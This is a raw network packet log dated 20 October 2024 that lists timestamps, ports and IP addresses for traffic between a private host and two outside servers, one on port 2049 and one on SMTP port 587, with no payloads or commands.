Oct 20, 2024 18:41:24.115552902 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115624905 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115624905 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115653038 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115668058 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115679979 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.115700006 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.115724087 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.119447947 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.119498014 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.119524002 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.119550943 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.119575977 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.119601965 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.119601965 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.119625092 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.119642973 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.120193005 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.120985031 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.122071981 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.126864910 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.126976013 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127028942 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127057076 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127072096 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127126932 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127156019 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127157927 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127178907 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127192020 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127218008 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127218962 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127229929 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127264977 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127270937 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127298117 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127317905 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127325058 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127341986 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127351999 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127372980 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127378941 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127393961 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127424955 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127518892 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127546072 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127561092 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127572060 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127593040 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127600908 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.127618074 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.127643108 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.128892899 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129026890 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129317999 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.129744053 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129775047 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129801035 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129827023 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129832983 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.129853964 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129857063 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.129879951 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.129880905 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129904032 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.129909039 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129919052 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.129935980 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129945040 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.129964113 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.129991055 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.130017042 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.130043983 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132364035 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132407904 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132461071 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132488966 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132550001 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132577896 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132622004 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132647991 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132673979 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132735968 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132764101 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132790089 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132814884 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132842064 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132882118 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132910967 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132936954 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.132963896 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133018017 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133044958 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133071899 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133097887 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133126020 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133152008 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133177996 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133203983 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133229971 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133244991 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.133263111 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133291960 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133302927 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.133318901 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133358955 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133385897 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133434057 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133460999 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133486032 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133512020 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133578062 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133604050 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133630991 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133656979 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133683920 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133709908 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133735895 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133764982 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133790970 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133816957 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133865118 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133892059 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133918047 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133948088 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.133974075 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134036064 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134066105 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134093046 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134841919 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134871006 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134897947 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134948969 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.134982109 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135008097 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135056973 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135082960 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135109901 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135138988 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135164976 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135566950 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135593891 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135621071 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135647058 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.135672092 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.136070967 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.138552904 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.138756037 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.138819933 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.138962030 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139069080 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139095068 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139120102 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139182091 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139209032 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139287949 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139319897 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139400005 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139451981 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139478922 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139504910 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139552116 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139578104 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139604092 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139630079 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139656067 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139682055 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139730930 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139759064 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139785051 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139811993 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139837027 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.139863014 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140225887 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140253067 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140279055 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140305042 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140331030 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140357018 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140383005 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140408993 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140435934 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140461922 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140487909 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140513897 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140539885 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140564919 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140590906 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140616894 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140642881 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140669107 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140695095 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140722036 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140748978 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.140774965 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.142370939 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.142396927 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.142469883 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.142496109 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.142522097 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.142549038 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.142872095 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.143074036 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.143127918 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.143979073 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144041061 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144068956 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144095898 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144126892 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144198895 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144226074 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144253016 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144279003 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144304991 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144330978 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144653082 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144731998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144761086 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144809008 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144835949 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144861937 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144887924 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144936085 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144962072 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.144989014 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145015001 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145041943 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145067930 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145114899 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145140886 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145167112 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145193100 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145219088 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145245075 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145271063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145297050 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145327091 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145657063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145689011 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145714998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145761967 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145787954 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145819902 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145848036 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145874977 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145900011 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145947933 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.145973921 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146001101 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146027088 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146054029 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146080017 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146127939 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146155119 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146182060 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146207094 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.146233082 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.147075891 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.147109032 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.147141933 CEST	587	49754	51.195.88.199	192.168.2.4
Oct 20, 2024 18:41:24.147444963 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:24.148066998 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148125887 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148156881 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148181915 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148267984 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148296118 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148322105 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148334980 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.148349047 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148375988 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148391962 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.148402929 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148415089 CEST	49754	587	192.168.2.4	51.195.88.199
Oct 20, 2024 18:41:24.148432970 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148458958 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148485899 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148535967 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148564100 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148590088 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148617029 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148642063 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148669004 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148694992 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148722887 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148752928 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148778915 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148804903 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148830891 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148879051 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148905039 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148932934 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148958921 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.148984909 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149010897 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149036884 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149063110 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149090052 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149115086 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149141073 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149436951 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149449110 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149461031 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149472952 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149485111 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149496078 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149507999 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149521112 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149525881 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149538040 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149549961 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149560928 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149573088 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149585962 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149597883 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149609089 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.149621010 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.153183937 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.153381109 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.153451920 CEST	49736	2049	192.168.2.4	212.162.149.53
Oct 20, 2024 18:41:24.154026031 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154038906 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154043913 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154078960 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154090881 CEST	2049	49736	212.162.149.53	192.168.2.4
Oct 20, 2024 18:41:24.154124975 CEST	2049	49736	212.162.149.53	192.168.2.4
